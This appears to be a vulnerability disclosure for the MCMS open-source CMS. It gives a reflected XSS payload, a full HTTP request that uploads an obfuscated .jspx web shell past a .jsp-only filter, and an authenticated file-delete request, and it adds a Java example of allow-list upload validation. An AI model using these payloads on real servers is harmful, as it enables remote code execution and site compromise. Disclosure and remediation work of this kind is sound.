An open source CMS project: https://github.com/ming-soft/MCMS
The MCMS vulnerabilities include:
Reflected XSS
Unauthenticated file upload
Authenticated file delete
Reproduce: reflected XSS
Path: /ms/template/unzip.do
The fileUrl parameter of this endpoint is reflected into the response, so it has a reflected XSS.
Payload 1: /ms/template/unZip.do?fileUrl=%3C/p%3E%3Cimg%20src=x%20onerror=alert(%27hacking%27)%3E
Authenticated file upload to RCE
An authenticated file upload exists at path /ms/file/uploadTemplate.do. It requires logging in to obtain a session Cookie before a file can be uploaded.
Unauthenticated file upload to RCE
Path: /file/upload
As the screenshot above shows, an attacker can upload a .jspx file to the server without any identity verification; when the project is packaged as a WAR and deployed in Tomcat, this yields a web shell on the server. The system filters the .jsp suffix, but .jspx is still accepted, which bypasses the filter.
Payload:

```http
POST /file/upload.do HTTP/1.1
Host: 192.168.100.103:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124088951720288539841514905041
Content-Length: 1393
Origin: http://192.168.100.103:8080
Connection: keep-alive

-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="uploadPath"

/
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="isRename"

false
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="appId"

false
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="file"; filename="shell.jspx"
Content-Type: image/png

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
    BASE64Decoder decoder = new BASE64Decoder();
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
    Process e = (Process) rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new Object[]{}), request.getParameter("cmd"));
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>
-----------------------------124088951720288539841514905041--
```
Source: net/mingsoft/basic/action/ManageFileAction.java
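As an added example (not MCMS code), the following Java contrasts a single-suffix deny-list of the kind the bypass above relies on with an allow-list check plus a server-generated stored name; the class, method names and allowed extensions are assumptions for illustration.

```java
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

// Added example, not project code: why a ".jsp" deny-list misses ".jspx",
// and what an allow-list check looks like instead.
public final class UploadNameCheck {

    // Weak: blocks only one suffix. "shell.jspx" passes because it does not end
    // with ".jsp", yet the servlet container still treats .jspx as a JSP document.
    static boolean weakCheck(String fileName) {
        return !fileName.toLowerCase(Locale.ROOT).endsWith(".jsp");
    }

    // Extensions this upload endpoint is expected to accept (assumed list).
    private static final Set<String> ALLOWED = Set.of("png", "jpg", "jpeg", "gif", "zip");

    // Strong: keep only the last path segment of the client-supplied name,
    // reject odd characters, and require the final extension to be allow-listed.
    static boolean strongCheck(String clientFileName) {
        if (clientFileName == null || clientFileName.isBlank()) return false;
        if (clientFileName.indexOf('\0') >= 0) return false;      // Paths.get would throw
        String name = Paths.get(clientFileName.replace('\\', '/')).getFileName().toString();
        int dot = name.lastIndexOf('.');
        if (dot <= 0 || dot == name.length() - 1) return false;   // no extension or trailing dot
        String ext = name.substring(dot + 1).toLowerCase(Locale.ROOT);
        return ALLOWED.contains(ext);
    }

    // Never store under the client's name (and ignore a client "isRename=false"):
    // generate the on-disk name on the server and keep only the validated extension.
    static String storedName(String clientFileName) {
        if (!strongCheck(clientFileName)) throw new IllegalArgumentException("rejected: " + clientFileName);
        String ext = clientFileName.substring(clientFileName.lastIndexOf('.') + 1).toLowerCase(Locale.ROOT);
        return UUID.randomUUID() + "." + ext;
    }

    public static void main(String[] args) {
        String[] names = {"logo.png", "shell.jspx", "shell.jsp", "shell.JSP",
                          "a.png.jspx", "../../shell.jspx", "shell.jsp."};
        for (String n : names) {
            System.out.printf("%-18s weak=%-5s strong=%s%n", n, weakCheck(n), strongCheck(n));
        }
        System.out.println("stored as: " + storedName("logo.png"));
    }
}
```

The weak check only rejects "shell.jsp"; the allow-list rejects every JSP variant and the path-traversal name, and the stored name no longer depends on anything the client sent.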
Authenticated file delete
Source: net/mingsoft/basic/action/TemplateAction.java
Payload:

```http
GET /ms/template/unZip.do?fileUrl=HACKED HTTP/1.1
Host: 192.168.100.103:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://192.168.100.103:8080/ms/template/index.do?
Cookie: JSESSIONID=56EC9CCC14E1E8DEE4AACCF732EA7FC7; pageno_cookie=1
```